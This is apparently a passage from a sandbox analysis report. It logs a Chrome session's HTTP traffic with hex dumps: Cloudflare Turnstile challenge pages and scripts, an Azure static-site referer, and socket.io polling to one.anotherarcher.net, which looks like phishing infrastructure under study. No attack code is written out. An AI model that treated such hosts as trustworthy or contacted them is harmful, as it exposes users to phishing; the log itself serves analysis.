                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC1369INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:24 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 165128
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                document-policy: js-profiling
                                                                                                                                                                                                                                critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                                                                                                                                cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                                                cross-origin-opener-policy: same-origin
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                referrer-policy: same-origin
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 63 66 64 38 32 38 34 39 61 66 34 32 66 32 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: Server: cloudflareCF-RAY: 8ccfd82849af42f2-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC1317INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC1369INData Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62
                                                                                                                                                                                                                                Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC1369INData Raw: 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74
                                                                                                                                                                                                                                Data Ascii: ght:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;st
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e
                                                                                                                                                                                                                                Data Ascii: allenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challen
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC1369INData Raw: 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70
                                                                                                                                                                                                                                Data Ascii: dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC1369INData Raw: 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65
                                                                                                                                                                                                                                Data Ascii: ,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffse
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC1369INData Raw: 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c
                                                                                                                                                                                                                                Data Ascii: n:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-start;display:flex;flex-flow:col
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC1369INData Raw: 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78
                                                                                                                                                                                                                                Data Ascii: rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC1369INData Raw: 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c
                                                                                                                                                                                                                                Data Ascii: challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#chall


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                86192.168.2.449846104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC487OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1438625525:1727987399:Ijto8JMFouAGt8YggseLV21TksqB395OrQnr3PCkYFY/8ccfd805a9cd425d/242f3f86f527414 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:24 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                cf-chl-out: Y+6jZYVloGWC7sRR3FI/n4PE/xcpEtM1FP4=$5f9+M0d1fJ6WHDRY
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd82848b94299-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                Data Ascii: invalid


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                87192.168.2.44984879.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC389OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB47a HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC225INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:24 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 118
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 67 73 37 36 30 34 54 49 72 32 51 57 37 36 53 50 41 41 4e 5a 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                                                                Data Ascii: 0{"sid":"gs7604TIr2QW76SPAANZ","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                88192.168.2.44984779.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC414OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB4i0&sid=upBLX-IH5e62neF1AANX HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC223INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:25 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 1
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC1INData Raw: 31
                                                                                                                                                                                                                                Data Ascii: 1


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                89192.168.2.449850104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:24 UTC730OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ccfd82849af42f2&lang=auto HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jrwmv/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC301INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:24 GMT
                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 119002
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd82b0a61c33a-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                                                                                                                                                                Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC1369INData Raw: 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 74 65 72 6d 73 22 3a 22 54 65 72 6d 73 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32
                                                                                                                                                                                                                                Data Ascii: Administrator%20if%20this%20problem%20persists.","turnstile_footer_terms":"Terms","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_failure":"Error","check_delays":"Verification%20is%20taking%20longer%20than%2
                                                                                                                                                                                                                                2024-10-03 20:57:25 UTC1369INData Raw: 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 36 31 37 36 30 33 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 32 39 35 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 67 4a 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 4a 3d 67 49 2c 64 3d 7b 27 58 71 73 68 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 55 43 54 4b 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 3d 68 7d 2c 27 4e 75 6c 64 6e 27 3a 67 4a 28 31 33 37 37 29 2c 27 79 62 56 67 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69
                                                                                                                                                                                                                                Data Ascii: ak;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,617603),eM=this||self,eN=eM[gI(1295)],eO=function(gJ,d,e,f,g){return gJ=gI,d={'Xqshj':function(h,i){return h==i},'UCTKK':function(h,i){return i!==h},'Nuldn':gJ(1377),'ybVgG':function(h,i){return h>i
